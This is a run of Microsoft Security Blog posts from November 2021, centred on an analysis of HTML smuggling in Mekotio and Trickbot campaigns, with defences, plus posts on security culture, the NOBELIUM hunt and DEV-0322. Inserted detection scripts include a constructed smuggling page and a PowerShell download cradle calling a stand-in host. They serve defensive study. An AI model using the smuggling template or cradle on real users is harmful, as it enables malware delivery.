Known ransomware loaders are fairly easy to detect, so attackers usually make slight changes to the file to evade file signature matching. They then distribute many versions of the file so they can increase the chances that at least one will not be blocked. Due to their polymorphic nature, these files can sometimes be missed by traditional approaches to malware detection. However, with real-time knowledge of the device state, adaptive cloud machine learning significantly reduces the chance of missing them.

Stopping ransomware payloads

Hypothetically, in attacks where early to mid-stage attack activities are not detected and blocked, AI-driven adaptive protection can still demonstrate huge value when it comes to the final ransomware payload. Given the device is already compromised, our AI-driven adaptive protection system can easily and automatically switch to the most aggressive mode and block the actual ransomware payloads, preventing important files and data from being encrypted so attackers won’t be able to demand ransom for them.

Smarter, faster protection from the cloud

With the AI-driven adaptive protection, Microsoft Defender for Endpoint can adjust the aggressiveness in real time according to the device state, buy security operations centers more time when incidents happen, and potentially stop an attack chain at the beginning. With the wide coverage and high blocking quality of this feature, we believe it will benefit all enterprise customers and further enhance the next generation of AI-powered protection.

The AI-driven adaptive protection feature in Microsoft Defender for Endpoint is just one of the many different AI layers that support our threat intelligence, which strengthen our ability to detect and protect against security threats. More threat data increases the quality of signals analyzed by Microsoft 365 Defender as it provides cross-domain defense against costly attacks like human-operated ransomware.


Microsoft 365 Defender Research Team

The post AI-driven adaptive protection against human-operated ransomware appeared first on Microsoft Security Blog.

How to assess and improve the security culture of your business

November 11th, 2021

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Cygenta Co-founder and Co-Chief Executive Officer Dr. Jessica Barker, author of “Confident Cyber Security: How to Get Started in Cyber Security and Futureproof Your Career” and co-author of “Cybersecurity ABCs: Delivering awareness, behaviors and culture change.” In this blog post, Jessica talks about how to build a security culture.

Natalia: How are most organizations doing? What is the state of cybersecurity culture?

Jessica: It varies—a lot of it comes down to resourcing and the emphasis placed on security from the leadership level. It can also come down to the experiences of the security team, security leadership, and the organization in terms of security incidents or near-misses. We’ve seen a lot of improvement in recent years, and that’s largely because there’s more awareness among leaders that security culture is important. Just 5 years ago, but particularly 10 years ago, there was very little discussion around culture and security culture.

Every year, we ask ClubCISO, a private group for senior information security professionals and security leaders, about security. For the last three years, they said security culture is their number one hot topic for the year ahead. They even said it in March 2021, tying with cloud. When I think about the year that cloud has had and the forced digital transformation many organizations have been through, it speaks volumes that security culture is as important of a priority as securely moving to the cloud.

Natalia: What does a cybersecurity culture assessment entail?

Jessica: In a cybersecurity culture assessment, we listen to the organization and the people who work there and understand security assumptions. When I speak to people about security culture, there’s often this idea that it is about how people behave, and that if we collect metrics around phishing, for example, it will tell us about the security culture. However, that will tell us something superficial. It’ll tell us what people are doing, not why they’re doing it.

Understanding the “why” is absolutely crucial because that’s your point of influence to change behavior. The “why” helps in understanding underlying assumptions and determining what you can do if there are gaps between what the security team wants and what people are doing.

The first stage is to understand the organizational culture, mission, and values and review the cultural symbols in the organization, including the branding, training, and messaging. Then, we run surveys, focus groups, and one-on-one interviews to encourage conversation, facilitate discussion, and understand what’s happening on a day-to-day basis, and most importantly, why.

Natalia: What are the indicators that a company needs a cybersecurity culture assessment?

Jessica: One prompt for most of our clients is that they feel like they need to do more to manage human risk, but they don’t know what. There may be incidents or near-misses. There may be indications around phishing or how people are managing passwords. There may be behavioral indicators—what they want from the people in the organization doesn’t match reality. Another key prompt is not understanding why their current culture isn’t developing in the way that they would want. Often, the organizations will have tried to deal with this in one way or another through awareness-raising, and there’s frustration because they’re telling people what to do, and they’re still not doing it. It takes a level of maturity, and it often takes organizations that aspire to be people-centric, to help their workforce be more security-conscious.

We measure security culture by gathering a lot of qualitative data to understand why people are doing what they’re doing. It goes back to the classic “start with why,” and then crunching numbers from surveys. We use grounded theory to qualify the data we get back. We immerse ourselves in that data and identify patterns. We also use anonymous quotes, comments, and keywords from workshops, focus groups, and one-on-one interviews to bring that story to life.

Natalia: What are typical challenges to establishing a positive security culture?

Jessica: I’m working with a financial services client that has a very positive organizational culture and lives by their values. But there have been challenges around security culture in this organization for many reasons, including fast digital transformation and growth. It’s taken them until this year to understand what a security culture means for their organization.

Because the people who work there felt loyalty to the organization, they wanted to behave in a secure way. They understood the importance of it, but there were blockers, including a lack of communication on why certain security controls were in place. It’s an entrepreneurial organization that moves quickly, so there were underlying cultural influences encouraging people to behave in less secure ways while prioritizing productivity. We’ve been undertaking a program to help the security team better communicate the “why,” and the organization has been receptive to it.

It’s also very hard to change behavior if the security leadership or organizational leadership team is not on board. Another consideration is the perception of a just culture. If somebody clicks a malicious link or makes a mistake, do they feel that they can put their hand up and report it without being unduly blamed? If people have a perception that the culture is about retribution and “pointing the finger,” that’s damaging to security culture.

Natalia: What’s the biggest mistake organizations make when trying to build and foster a security culture?

Jessica: To try to build a security culture that is not aligned with the business culture. One organization I worked with a few years ago was a very positive and people-centric healthcare organization. They were always seeking to say, “Yes,” to people in their wider organizational culture, but the security team was pushing a security culture that said, “No,” and was perceived as the “Department of No,” like many security teams. That’s a really common problem because the organizational culture will always win out, and if you try and bolt on a security culture that runs against the wider organization, it won’t work.

Often, the organizational culture of a company is not prepared to build a positive cybersecurity culture, and change requires patience. It’s a slow journey. That kind of client isn’t ready for a security culture assessment, so the work focuses on influencing the senior leadership to show them the importance of security culture. When organizations want a security culture assessment, that’s when they’re ready for it.

Natalia: How does the psychological well-being of the security team impact the security culture?

Jessica: At one organization, there was a lack of communication around security. The security team was so stressed, burnt-out, busy, and overworked that they didn’t have time to engage with their colleagues in the rest of the business. It led to the impression that the security team was not friendly or approachable, and it created a barrier to a positive security culture. Taking care of the well-being of the security function is fundamental.

To immediately improve the well-being of their team, managers can talk about the issues. If you’re comfortable doing so, this can include talking about your own mental well-being or acknowledging burnout stress and impostor syndrome. These are real issues in the industry, and it can be a relief for people to hear that they’re not alone and to have this safe space. It makes everyone feel more comfortable saying, “Hey, I need a day off for my mental health.” Mental health days are crucial in organizations, but leadership must show that they’re a priority.

Natalia: Besides an assessment, how can security teams improve their understanding of human risk?

Jessica: Behavioral economics, neuroscience, and psychology are all disciplines that can teach us about the human side of security and security culture. I’d recommend books like “Nudge,” “Thinking Fast and Slow”, and the work of Tali Sharot, a neuroscientist, whose work on the optimism bias is very relevant to security. There’s also a lot of great work being done in academia on security culture—papers and research that are advancing the field. It was interesting as well to see this year that Verizon did a shout-out to security culture for the first time in their data breach investigation report. Security culture is going more mainstream and is now higher up on the agenda in the security profession.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to assess and improve the security culture of your business appeared first on Microsoft Security Blog.

HTML smuggling surges: Highly evasive loader technique increasingly used in banking malware, targeted attacks

November 11th, 2021

HTML smuggling, a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns that deploy banking malware, remote access Trojans (RATs), and other payloads related to targeted attacks. Notably, this technique was observed in a spear-phishing campaign from the threat actor NOBELIUM in May. More recently, we have also seen this technique deliver the banking Trojan Mekotio, as well as AsyncRAT/NJRAT and Trickbot, malware that attackers utilize to gain control of affected devices and deliver ransomware payloads and other threats.

As the name suggests, HTML smuggling lets an attacker “smuggle” an encoded malicious script within a specially crafted HTML attachment or web page. When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device. Thus, instead of having a malicious executable pass directly through a network, the attacker builds the malware locally behind a firewall.

Diagram showing typical attack chain of HTML smuggling

Figure 1. HTML smuggling overview

This technique is highly evasive because it can bypass standard perimeter security controls, such as web proxies and email gateways, that often only check for suspicious attachments (for example, EXE, ZIP, or DOCX) or for traffic matching signatures and patterns. Because the malicious files are created only after the HTML file is loaded on the endpoint through the browser, all that some protection solutions see at the onset is benign-looking HTML and JavaScript, which can also be obfuscated to further hide its true purpose.

Threats that use HTML smuggling bank on the legitimate uses of HTML and JavaScript in daily business operations in their attempt to stay hidden and relevant, as well as to challenge organizations’ conventional mitigation procedures. For example, disabling JavaScript could mitigate HTML smuggling implemented with JavaScript Blobs. However, JavaScript is needed to render business-related and other legitimate web pages. In addition, there are multiple ways to implement HTML smuggling through obfuscation and numerous ways of writing the JavaScript, making the technique highly evasive against content inspection. Therefore, organizations need a true “defense in depth” strategy and a multi-layered security solution that inspects email delivery, network activity, endpoint behavior, and follow-on attacker activities.

The surge in the use of HTML smuggling in email campaigns is another example of how attackers keep refining specific components of their attacks by integrating highly evasive techniques. Microsoft Defender for Office 365 stops such attacks at the onset using dynamic protection technologies, including machine learning and sandboxing, to detect and block HTML-smuggling links and attachments. Email threat signals from Defender for Office 365 also feed into Microsoft 365 Defender, which provides advanced protection on each domain—email and data, endpoints, identities, and cloud apps—and correlates threat data from these domains to surface evasive, sophisticated threats. This provides organizations with comprehensive and coordinated defense against the end-to-end attack chain.

This blog entry details how HTML smuggling works, provides recent examples of threats and targeted attack campaigns that use it, and enumerates mitigation steps and protection guidance.

How HTML smuggling works

HTML smuggling uses legitimate features of HTML5 and JavaScript, which are both supported by all modern browsers, to generate malicious files behind the firewall. Specifically, HTML smuggling leverages the HTML5 “download” attribute for anchor tags, as well as the creation and use of a JavaScript Blob to put together the payload downloaded into an affected device.

In HTML5, when a user clicks a link, the “download” attribute on the anchor tag tells the browser to download the file referenced by the “href” attribute rather than navigate to it. For example, the code below instructs the browser to download “malicious.docx” from its location and save it on the device as “safe.docx”:

Screenshot of code for download of document

The anchor tag and a file’s “download” attribute also have their equivalents in JavaScript code, as seen below:

Screenshot of code for download attribute in JavaScript

The use of JavaScript Blobs adds to the “smuggling” aspect of the technique. A JavaScript Blob holds the data of a file (typically decoded in the page from an encoded string) and can be passed to a JavaScript API that expects a URL, which yields a link to the in-memory object. This means that instead of providing a link to an actual file that a user must manually click to download, the file can be automatically downloaded and constructed locally on the device using JavaScript code like the following:

Screenshot of code for automatic download
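The indicators described in this section (an anchor carrying a “download” attribute, a Blob built from data embedded in the page and handed to an API that expects a URL, an automatic click) can be checked statically on an attachment before any browser renders it. The following Python triage script is an added example, not Microsoft Defender’s detection logic; the two sample attachments, the indicator list and the harmless text the sample “smuggles” are all constructed.

```python
"""Static triage of an HTML e-mail attachment for HTML smuggling indicators.
Added example, not Microsoft Defender's detection logic. The indicator list,
the two sample attachments and the "smuggled" content (harmless text) are
all constructed for illustration."""
import base64
import re
from html.parser import HTMLParser

# Constructed sample with the shape the post describes: data embedded in the
# page is decoded into a Blob, handed to an API that expects a URL, and then
# saved through an anchor's "download" attribute without a user click.
SMUGGLING_HTML = """<html><body><p>Your document is ready.</p>
<script>
var data = "%s";
var bytes = Uint8Array.from(atob(data), function (c) { return c.charCodeAt(0); });
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
a.click();
</script></body></html>""" % base64.b64encode(b"constructed harmless sample").decode()

# Constructed benign page: an ordinary static download link and a tiny script.
BENIGN_HTML = """<html><body><a href="report.docx" download="report.docx">Report</a>
<script>document.title = "Monthly report";</script></body></html>"""

# Each indicator on its own is ordinary web development; it is the chain
# (Blob -> object URL -> download trigger) inside an attachment that matters.
INDICATORS = {
    "blob_ctor": r"new\s+Blob\s*\(",
    "object_url": r"createObjectURL\s*\(|msSaveOrOpenBlob\s*\(",
    "base64_decode": r"\batob\s*\(",
    "anchor_download": r"\.download\s*=",
    "auto_click": r"\.click\s*\(\s*\)",
    "octet_stream": r"application/octet-stream",
}
MIN_LITERAL_LEN = 16  # constructed; real smuggled payloads are far longer


class SmugglingParser(HTMLParser):
    """Collects inline script bodies and counts <a download> anchors."""

    def __init__(self):
        super().__init__()
        self.scripts, self.download_anchors, self._in_script = [], 0, False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "a" and any(name == "download" for name, _ in attrs):
            self.download_anchors += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def triage_html(html):
    """Return (verdict, hits). hits lists every indicator found; the verdict
    is 'suspicious' only when the full materialise-and-download chain is
    present, so a plain static download link stays 'clean'."""
    parser = SmugglingParser()
    parser.feed(html)
    js = "\n".join(parser.scripts)
    hits = {name for name, pattern in INDICATORS.items() if re.search(pattern, js)}
    if parser.download_anchors:
        hits.add("anchor_download")
    # A long Base64-looking string literal inside a script is the embedded payload.
    if re.search(r'["\'][A-Za-z0-9+/=]{%d,}["\']' % MIN_LITERAL_LEN, js):
        hits.add("embedded_base64")
    chain = {"blob_ctor", "object_url"} <= hits and bool(
        {"anchor_download", "auto_click"} & hits)
    return ("suspicious" if chain else "clean", sorted(hits))


if __name__ == "__main__":
    print(triage_html(SMUGGLING_HTML))
    print(triage_html(BENIGN_HTML))
```

Obfuscated scripts will defeat a literal regex pass like this one, which is why the post recommends layering it with sandboxing and endpoint behaviour monitoring rather than relying on content inspection alone.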

Today’s attacks use HTML smuggling in two ways: the link to an HTML smuggling page is included within the email message, or the page itself is included as an attachment. The following section provides examples of actual threats we have recently seen using either of these methods.

Real-world examples of threats using HTML smuggling

HTML smuggling has been used in banking malware campaigns, notably attacks attributed to DEV-0238 (also known as Mekotio) and DEV-0253 (also known as Ousaban), targeting Brazil, Mexico, Spain, Peru, and Portugal. In one of the Mekotio campaigns we’ve observed, attackers sent emails with a malicious link, as shown in the image below.

Screenshot of email with malicious link

Figure 2. Sample email used in a Mekotio campaign. Clicking the link starts the HTML smuggling technique.

Diagram showing attack chain of Mekotio campaign using the HTML smuggling technique

Figure 3. Threat behavior observed in the Mekotio campaign

In this campaign, a malicious website, hxxp://poocardy[.]net/diretorio/, is used to implement the HTML smuggling technique and drop the malicious downloader file. The image below shows an HTML smuggling page when rendered on the browser.

Screenshot of code of HTML smuggling page

Figure 4. HTML smuggling page of the Mekotio campaign. Note how the “href” attribute references a JavaScript Blob with the application/octet-stream MIME type to download the malicious ZIP file.

It should be noted that this attack relies on social engineering and user interaction to succeed. When a user clicks the emailed hyperlink, the HTML page drops a ZIP file containing an obfuscated JavaScript file.

Screenshot of HTML code for dropping ZIP file

Figure 5. ZIP file with an obfuscated JavaScript file

When the user opens the ZIP file and executes the JavaScript, the script connects to hxxps://malparque[.]org/rest/restfuch[.]png and downloads another ZIP file that masquerades as a PNG file. This second ZIP file contains the following files related to DAEMON Tools:

  • sptdintf.dll – This is a legitimate file. Various virtual disc applications, including DAEMON Tools and Alcohol 120%, use this dynamic-link library (DLL) file.
  • imgengine.dll – This is a malicious file that is either Themida-packed or VMProtected for obfuscation. It accesses geolocation information of the target and attempts credential theft and keylogging.
  • An executable file with a random name, which is a renamed legitimate file “Disc Soft Bus Service Pro.” This legitimate file is part of DAEMON Tools Pro and loads both DLLs.

Finally, once the user runs the primary executable (the renamed legitimate file), it loads the malicious DLL via DLL sideloading. As previously mentioned, this DLL is attributed to Mekotio, a family of banking Trojans typically deployed on Windows systems that has targeted Latin American industries since the latter half of 2016.

HTML smuggling in targeted attacks

Beyond banking malware campaigns, various cyberattacks, including more sophisticated, targeted ones, incorporate HTML smuggling in their arsenal. Such adoption shows how tactics, techniques, and procedures (TTPs) move from cybercrime gangs to targeted threat actors and back again. It also reflects the current state of the underground economy, where TTPs that prove effective get commoditized.

For example, in May, Microsoft Threat Intelligence Center (MSTIC) published a detailed analysis of a new sophisticated email attack from NOBELIUM. MSTIC noted that the spear-phishing email used in that campaign contained an HTML file attachment which, when opened by the targeted user, uses HTML smuggling to download the main payload onto the device.

Since then, other malicious actors appear to have followed suit and adopted the technique for their own campaigns. Between July and August, open-source intelligence (OSINT) community signals showed an uptick in HTML smuggling in campaigns that deliver remote access Trojans (RATs) such as AsyncRAT/NJRAT.

In September, we saw an email campaign that leverages HTML smuggling to deliver Trickbot. Microsoft attributes this Trickbot campaign to an emerging, financially motivated cybercriminal group we’re tracking as DEV-0193.

In this campaign, the attacker sends a specially crafted HTML page as an attachment to an email message purporting to be a business report.

Screenshot of HTML page attached in a email used in a Trickbot campaign

Figure 6. HTML smuggling page attached in a Trickbot spear-phishing campaign

When the target recipient opens the HTML attachment in a web browser, it constructs a JavaScript file and saves it in the device’s default Downloads folder. As an added detection-evasion technique against endpoint security controls, the created file is password-protected, so the user must type the password indicated in the original HTML attachment to open it.

Screenshots of HTML page and the JavaScript downloader built in the browser

Figure 7. HTML attachment constructs a password-protected downloader JavaScript in the browser

Once the user executes the JavaScript, it launches a Base64-encoded PowerShell command, which then calls back to the attacker’s servers to download Trickbot.
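As an added example, not code from the original post, the following Node.js script decodes the kind of Base64-encoded PowerShell command line described above, as an analyst would when it turns up in EDR or Sysmon process-creation telemetry. powershell.exe’s -EncodedCommand takes Base64 of UTF-16LE text, which is why a naive Base64-to-UTF-8 decode looks garbled. The sample command line, its .invalid host, and the flag regex are constructed for this example; the actual Trickbot command is not reproduced here.

```javascript
// Added example, not code from the original post: pull a -EncodedCommand
// argument out of a PowerShell command line and decode it. powershell.exe
// expects Base64 of UTF-16LE text, so a plain Base64-to-UTF-8 decode yields
// "h.t.t.p." with NUL bytes between letters. All inputs here are constructed.

// powershell.exe accepts -EncodedCommand, -e, -ec and longer prefixes such as
// -Enc; the alternation below takes those and nothing else (-ep, -exec, -File
// do not match). Case-insensitive, since the shell is.
const ENC_FLAG = /(?:^|\s)[-\/](?:e|ec|en[a-z]*)\s+["']?([A-Za-z0-9+\/=]+)/i;

// Encode a script the way a stager would, so the sample below is realistic.
function encodeForPowerShell(script) {
  return Buffer.from(script, 'utf16le').toString('base64');
}

// Return null when there is no encoded command, otherwise the decoded script,
// the encoding that produced a sensible result, and any URLs it references.
function decodeEncodedCommand(commandLine) {
  const m = ENC_FLAG.exec(commandLine);
  if (!m) return null;
  const raw = Buffer.from(m[1], 'base64');
  // UTF-16LE ASCII text has 0x00 as every second byte; anything else is most
  // likely a log that stored the UTF-8 form, so decode accordingly.
  const utf16 = raw.length >= 2 && raw[1] === 0x00;
  const script = utf16 ? raw.toString('utf16le') : raw.toString('utf8');
  const urls = script.match(/https?:\/\/[^\s'"()]+/gi) || [];
  return { encoding: utf16 ? 'utf16le' : 'utf8', script, urls };
}

// Constructed sample: a one-line download cradle pointing at a reserved
// .invalid host, wrapped in the usual -NoP -W Hidden -Enc arguments.
const SAMPLE_SCRIPT =
  "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')";
const SAMPLE_CMDLINE =
  'powershell.exe -NoP -W Hidden -Enc ' + encodeForPowerShell(SAMPLE_SCRIPT);

function showDecoded() {
  const lines = [SAMPLE_CMDLINE, 'powershell.exe -ep bypass -File report.ps1'];
  for (const line of lines) {
    const result = decodeEncodedCommand(line);
    if (result === null) {
      console.log('no encoded command: ' + line);
    } else {
      console.log(`${result.encoding}: ${result.script}  urls=${result.urls.join(',')}`);
    }
  }
}
showDecoded();
```

The URL list is the part worth feeding onward: it is the callback infrastructure the paragraph above describes, and it is what you would block at the proxy and pivot on in the rest of the fleet.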

Attack chain diagram of Trickbot campaign using HTML smuggling technique

Figure 8. HTML smuggling attack chain in the Trickbot spear-phishing campaign

Based on our investigations, DEV-0193 targets organizations primarily in the health and education industries and works closely with ransomware operators, such as those behind the infamous Ryuk ransomware. After compromising an organization, this group acts as a pivot point and enabler for follow-on ransomware attacks, often selling the unauthorized access it has gained to those operators. Once this group compromises an environment, it is therefore highly likely that a ransomware attack will follow.

Defending against the wide range of threats that use HTML smuggling

HTML smuggling presents challenges to traditional security solutions. Effectively defending against this stealthy technique requires true defense in depth. It is always better to thwart an attack early in the attack chain, at the email gateway and web filtering level. If the threat slips past perimeter security and is delivered to a host, endpoint protection controls should be able to prevent execution.

Microsoft 365 Defender uses multiple layers of dynamic protection technologies, including machine learning-based protection, to defend against malware threats and other attacks that use HTML smuggling at various levels. It correlates threat data from email, endpoints, identities, and cloud apps, providing in-depth and coordinated threat defense. All of these are backed by threat experts who continuously monitor the threat landscape for new attacker tools and techniques.

Microsoft Defender for Office 365 inspects attachments and links in emails to detect and alert on HTML smuggling attempts. Over the past six months, Microsoft blocked thousands of HTML smuggling links and attachments. The timeline graphs below show a spike in HTML smuggling attempts in June and July.

Graph showing spike of HTML smuggling links

Figure 9. HTML smuggling links detected and blocked

Graph showing spike of HTML smuggling attachment

Figure 10. HTML smuggling attachments detected and blocked

Safe Links and Safe Attachments provide real-time protection against HTML smuggling and other email threats by detonating links and attachments in a virtual environment before messages are delivered to recipients. Thousands of suspicious behavioral attributes are detected and analyzed in emails to determine whether a message is a phishing attempt. For example, behavioral rules that check for the following have proven successful in detecting malware-smuggling HTML attachments:

  • An attached ZIP file contains JavaScript
  • An attachment is password-protected
  • An HTML file contains suspicious script code
  • An HTML file decodes Base64 content or contains obfuscated JavaScript

Through automated and threat expert analyses, existing rules are modified, and new ones are added daily.

On endpoints, attack surface reduction rules block or audit activity associated with HTML smuggling. The following rules can help:

  • Block JavaScript or VBScript from launching downloaded executable content
  • Block execution of potentially obfuscated scripts
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities detect malicious files, malicious behavior, and other related events before and after execution. Advanced hunting, meanwhile, lets defenders create custom detections to proactively find related threats.

Defenders can also apply the following mitigations to reduce the impact of threats that utilize HTML smuggling:

  • Prevent JavaScript files from executing automatically by changing the file associations for .js and .jse files.
    • Create new Open With parameters in the Group Policy Management Console under User Configuration > Preferences > Control Panel Settings > Folder Options.
    • Create parameters for .jse and .js file extensions, associating them with notepad.exe or another text editor.
  • Check Office 365 email filtering settings to ensure they block spoofed emails, spam, and emails with malware. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Office 365 to recheck links on click and neutralize malicious messages that have already been delivered in response to newly acquired threat intelligence.
  • Check the perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Such restrictions help inhibit malware downloads and command and control (C2) activity.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites. Turn on network protection to block connections to malicious domains and IP addresses.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Educate users about preventing malware infections. Encourage users to practice good credential hygiene—limit the use of accounts with local or domain admin privileges and turn on Microsoft Defender Firewall to prevent malware infection and stifle propagation.

Learn how you can stop attacks through automated, cross-domain security with Microsoft 365 Defender.

 

Microsoft 365 Defender Threat Intelligence Team

The post HTML smuggling surges: Highly evasive loader technique increasingly used in banking malware, targeted attacks appeared first on Microsoft Security Blog.

The hunt for NOBELIUM, the most sophisticated nation-state attack in history

November 10th, 2021

This is the second in a four-part blog series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELIUM incident and on how world-class threat hunters from Microsoft and around the industry came together to take on this adversary. In this second post, we explore the investigation covered in the second episode of the docuseries.

The threat hunters had but weeks to unravel a global attack that had been planned and executed by an advanced adversary for over a year. The early days of a cyberattack investigation can feel like joining a high-stakes chess match after your opponent has already made a series of moves. You must figure out what your adversary has done while anticipating their next step, and launching a counterplay—all simultaneously. Instead of on a chessboard, your clues are found in the code, logs, and responses to your counterattacks. In the case of the NOBELIUM nation-state attack, this was a highly skilled chess player, but we came together as a company and as an industry to take on this shared adversary. This all started when one security company, Mandiant (formerly known as FireEye), spotted an anomaly in its own environment and shared the evidence with Microsoft for additional analysis, but this story would eventually involve thousands of defenders across the industry to uncover the full picture and help protect organizations.

As explained in our first post in this series, How nation-state attackers like NOBELIUM are changing cybersecurity, nation-state attacks are malicious cyberattacks that originate from a particular country and are an attempt to further that country’s interests. The nation-state attack from NOBELIUM, a Russia-sponsored group of hackers, is widely recognized as the most sophisticated in history. The group gained access to multiple enterprises before their actions were detected. This second episode of “Decoding NOBELIUM” explores how the group was detected and how defenders responded in the weeks that followed.

How was NOBELIUM detected?

It was late November 2020 when a security analyst at cybersecurity company Mandiant detected something unusual in its environment. While reviewing sign-in logs for the previous day, he noticed an event for a user with a different registered device. Intuition told him something was off, so he called the user to ask if they’d registered a new device. The answer would set off an unprecedented, industry-wide hunt to catch an adversary. The user said, “No.”

The security professional alerted his colleagues, including his supervisor, Charles Carmakal, Mandiant Senior Vice President and Chief Technology Officer. While they didn’t yet know the identity of the adversary, they would come to realize the importance of this initial detection.

Recognizing that his company needed more collaboration and telemetry to better understand the nature of the attack, Carmakal quickly turned to Microsoft. It was about 9:00 PM when Microsoft Detection and Response Team (DART) Lead Dan Taylor received the call asking for help. Dan initially thought Carmakal was joking and when he realized it was serious, he called Microsoft DART Lead Investigator Roberto, who was taking his dog for the last walk of the day, to ask him if he recognized the anomalous code Mandiant had found. Roberto confirmed that he had seen this anomaly during a previous nation-state investigation.

How did the defense team come together?

Every second counts when responding to large-scale cyberattacks like this. NOBELIUM had a year-long advantage on the defenders. A global threat-hunting effort was formed around the Microsoft Threat Intelligence Center, which defends Microsoft and its customers from advanced threat actors around the world. They immediately activated Microsoft’s team of global security experts, who are on-call for major incidents.

Microsoft Security Analyst Joanne was lacing up her hiking boots on a Saturday when she received a text from her supervisor to the entire team that read, “We need all hands on deck for an active incident.” The hike would have to wait as she and her teammates began studying the available data for indicators of an attack.

As Microsoft continued to partner with Mandiant, it quickly became clear that this attack extended well beyond one security company. The Microsoft response team grew along with this knowledge. With every meeting, another 50 to 100 Microsoft threat experts joined in—everyone came together to help. And the industry-wide collaboration grew as well. “Many different partners across the industry came together with a common goal,” said Ramin, Senior Malware Reverse Engineer with the Microsoft Threat Intelligence Center.

The biggest challenge was the sophisticated tradecraft of the attacker. They practiced extreme variability. “It became very clear to us that we were dealing with a highly capable, highly clandestine, and advanced adversary,” said Carmakal. NOBELIUM would never use the same IP address across organizations—even going so far as to change it every time the group re-entered the same organization’s network. That meant that traditional markers—including hashes, file names, and IP addresses—were all brittle indicators and less helpful for tracking the attacker’s path. Over time, they began identifying subtle markers of malicious activity.

The team’s relentless investigation led to a breakthrough: they discovered that the unknown threat actor was stealing credentials and moving through networks undetected. During the ongoing investigation, the team uncovered anomalous activity within the SolarWinds platform. After decompiling 50,000 lines of SolarWinds’ code, Mandiant and Microsoft’s reverse engineers identified NOBELIUM malware carefully obfuscated within layers of code, designed to spread undetected to thousands of target organizations. “When we found that scope, it was a combination of exciting and scary,” said Pete, Senior Software Engineer of the Microsoft Threat Intelligence Center.

“You got a sense that this attacker could start in hundreds of customer networks, very deep into them with elevated rights,” said John Lambert, General Manager of the Microsoft Threat Intelligence Center. “When you realize how many enterprise customers and government departments use [SolarWinds], you knew that this attacker had achieved a place to have major impact, across the globe.”

Over weeks, the hunters uncovered a sophisticated, advanced threat with a scale and scope beyond anything they could have initially guessed. Now, it was time to use that hard-won knowledge to find and repel the current threat from NOBELIUM and prepare for future attacks.

NOBELIUM lessons

How did cybersecurity professionals identify NOBELIUM as the threat actor behind the attack and what can your organization do to detect and respond to nation-state attacks? In the second episode of our four-part video series “Decoding Nobelium,” security professionals talk about the investigation that followed the discovery of NOBELIUM’s attack. Watch the episode for tips on how to protect your organization against cyberattacks.

Microsoft is committed to helping organizations stay protected from cyberattacks, whether cybercriminal or nation-state. In particular, nation-state adversaries have significant expertise and resources and will develop new attack patterns to further their geopolitical objectives. Consistent with our mission to provide security for all, Microsoft will use our leading threat intelligence and global team of dedicated cybersecurity defenders to help protect our customers and the world. Two recent examples of Microsoft’s efforts to combat nation-state attacks are our September 2021 analysis of a NOBELIUM backdoor referred to as FoggyWeb, and our May 2021 profiling of NOBELIUM’s early-stage toolset comprising EnvyScout, BoomBox, NativeZone, and VaporRage.

For immediate support, reach out to the Microsoft Security Response Center. Keep an eye out for future posts in the NOBELIUM nation-state attack series, where we share how we fought the NOBELIUM threat and predict the future of cybersecurity. Read our previous post in this series, How nation-state attackers like NOBELIUM are changing cybersecurity.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The hunt for NOBELIUM, the most sophisticated nation-state attack in history appeared first on Microsoft Security Blog.


Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus

November 9th, 2021

Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to CVE-2021-40539 in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.

MSTIC previously highlighted DEV-0322 activity related to attacks targeting the SolarWinds Serv-U software with a zero-day exploit. As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.

Our colleagues at Palo Alto Unit 42 have also highlighted this activity in their recent blog. We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in Black Lotus Labs at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.

This blog shares what Microsoft has observed in the latest DEV-0322 campaign and informs our customers of the protections in place through our security products. We have not observed any exploitation of Microsoft products in this activity.

MSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.

Activity description

MSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.

Credential dumping

